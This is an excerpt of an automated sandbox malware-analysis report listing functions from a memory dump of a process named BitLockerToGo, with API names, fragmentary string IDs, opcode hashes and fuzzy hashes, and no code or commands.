                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 598aa20c43fb88feaa766f574fdc787b1cbef1468dd2943a842930ea76f93f8e
                                                                                                                  • Instruction ID: 48584098cee5cf6c9b2662225f707eaaac6937ed13b4ad37672816aca49925fd
                                                                                                                  • Opcode Fuzzy Hash: 598aa20c43fb88feaa766f574fdc787b1cbef1468dd2943a842930ea76f93f8e
                                                                                                                  • Instruction Fuzzy Hash: CED05EE5D106418BDB08DF50E84582773696A8260DF8A983DE40653203F234E01D8A1E
                                                                                                                  Function 00434131 Relevance: 50.9, APIs: 1, Strings: 28, Instructions: 150memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocString
                                                                                                                  • String ID: !$+$,$-$0$0$1$2$3$4$5$5$5$8$:$;$<$?$I$J$N$Q$c$l$q$u$w$z
                                                                                                                  • API String ID: 2525500382-3827119089
                                                                                                                  • Opcode ID: e8028504e96c01447a7cd07fad640249513cb4d7ce858c425dcb050b5ab97bbe
                                                                                                                  • Instruction ID: 2077d09fd2abf4de34fc705b00f4d73c97ad3b61c6505aebd331944c99a2a4b8
                                                                                                                  • Opcode Fuzzy Hash: e8028504e96c01447a7cd07fad640249513cb4d7ce858c425dcb050b5ab97bbe
                                                                                                                  • Instruction Fuzzy Hash: 5381A42050CBC189D3228A7C885874FFFD15BA7328F484B9DF5E54B3E2D2A9854AC767
                                                                                                                  Function 00433A94 Relevance: 49.2, APIs: 1, Strings: 27, Instructions: 151memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocString
                                                                                                                  • String ID: !$+$,$-$0$0$1$2$3$4$5$5$5$8$:$;$<$I$J$N$Q$c$l$q$u$w$z
                                                                                                                  • API String ID: 2525500382-2063723375
                                                                                                                  • Opcode ID: 543cf35ce62da0c0611fad8b13d6099b11e4015da998b60fb1279dc7d8dcf1cc
                                                                                                                  • Instruction ID: d26f66b26cb5db2ea61353f9e6f92556f257390ea162a1987fb8adee52d5c9e0
                                                                                                                  • Opcode Fuzzy Hash: 543cf35ce62da0c0611fad8b13d6099b11e4015da998b60fb1279dc7d8dcf1cc
                                                                                                                  • Instruction Fuzzy Hash: 8081C56041CBC289D322867C884874FFFD15BA7328F581B9DF5E54B3E2C2A9854AC767
                                                                                                                  Function 004331A0 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 89COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                  • String ID: ?$j$k$l$p$q$t$t
                                                                                                                  • API String ID: 2610073882-675845199
                                                                                                                  • Opcode ID: fcfd223d7692d6bf885c3696c4d9e809cc900c3a497fef6223723d33fcf731f2
                                                                                                                  • Instruction ID: 09b50d42e1b1eecc01dbba5cc5ed3444b7fcbc98f04a8e12bfb69ca513257c0b
                                                                                                                  • Opcode Fuzzy Hash: fcfd223d7692d6bf885c3696c4d9e809cc900c3a497fef6223723d33fcf731f2
                                                                                                                  • Instruction Fuzzy Hash: 1251F52040D7C18AE332DB788858B9FBFD1ABA2224F084B9ED4E95B2D2C7754549C763
                                                                                                                  Function 00432D32 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 69COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitVariant
                                                                                                                  • String ID: !$"$#$%$2$4$C
                                                                                                                  • API String ID: 1927566239-3975892311
                                                                                                                  • Opcode ID: 2fedba33b77c455fe316035b441e0c9daabddb66c0dec94f8709afb57110d96b
                                                                                                                  • Instruction ID: 4f4546ffc5f28aa05d9cb6a276f77c79afe39a1f84e47cccee4278b6cc2b1f78
                                                                                                                  • Opcode Fuzzy Hash: 2fedba33b77c455fe316035b441e0c9daabddb66c0dec94f8709afb57110d96b
                                                                                                                  • Instruction Fuzzy Hash: 3B316C7140C7C48ED33A8B38845A3DABFD0AB9A324F084A5DD5E94B3D2C7B50649D797
                                                                                                                  Function 004345B7 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 191COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: String
                                                                                                                  • String ID: [$d$g$m$n
                                                                                                                  • API String ID: 2568140703-2539253441
                                                                                                                  • Opcode ID: a05d4c57d53aafe4507aa6b4e0babcc37262c8cb895939a36f0023029053849a
                                                                                                                  • Instruction ID: 829fe66b493e8a2549bfc4ccf3c791a524893315e88f27edc493aad5d051545f
                                                                                                                  • Opcode Fuzzy Hash: a05d4c57d53aafe4507aa6b4e0babcc37262c8cb895939a36f0023029053849a
                                                                                                                  • Instruction Fuzzy Hash: 1661B632A087914BC7388E2C84513EAB6D2BBDA324F19472DD8EAD73D1DB795C019786
                                                                                                                  Function 00434863 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 187COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: String
                                                                                                                  • String ID: [$d$g$m$n
                                                                                                                  • API String ID: 2568140703-2539253441
                                                                                                                  • Opcode ID: e1e2e31c760a26d7c5abf44a959447e1672dcdee85e199c813d0f1c64a0ef85e
                                                                                                                  • Instruction ID: 9e282d84cd82632bb62c9644fa7e1fa7ed105586502258d5919e28b1497e6a81
                                                                                                                  • Opcode Fuzzy Hash: e1e2e31c760a26d7c5abf44a959447e1672dcdee85e199c813d0f1c64a0ef85e
                                                                                                                  • Instruction Fuzzy Hash: DE61C972A087918FC7398A3C88503EBB7D2ABD9324F19876DD4E9C73D1DA3958019786
                                                                                                                  Function 00433D17 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 91COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                  • String ID: &$<$>$m
                                                                                                                  • API String ID: 2610073882-178507215
                                                                                                                  • Opcode ID: 7029382f9956752a3c1fd0bba91532cdc52e590f792ef2624961f2a538147185
                                                                                                                  • Instruction ID: 089dbe8d1d2480f48323f9940022ac24e3dc0ff7a7cc8a2a9af20ee4cf7c4a80
                                                                                                                  • Opcode Fuzzy Hash: 7029382f9956752a3c1fd0bba91532cdc52e590f792ef2624961f2a538147185
                                                                                                                  • Instruction Fuzzy Hash: BA41483144C7C2CAD332CA28C418B9FBFD06BA6324F088AADD4E94B7D2D6750046DB63
                                                                                                                  Function 00432F47 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                  • String ID: 9$:
                                                                                                                  • API String ID: 2610073882-3810475801
                                                                                                                  • Opcode ID: a2e342ce91eefcd9f724de67794f2ad5bc4e29647a76c3a4e77d0953b6086d56
                                                                                                                  • Instruction ID: 2905d024869000e1db40c519c04c0c68580657e610396e459be5e1da1c07211c
                                                                                                                  • Opcode Fuzzy Hash: a2e342ce91eefcd9f724de67794f2ad5bc4e29647a76c3a4e77d0953b6086d56
                                                                                                                  • Instruction Fuzzy Hash: 41412F3160C7C18ED3328B2C885878BBEE1AB97324F584A9DD8E94B2D2D7B54509C763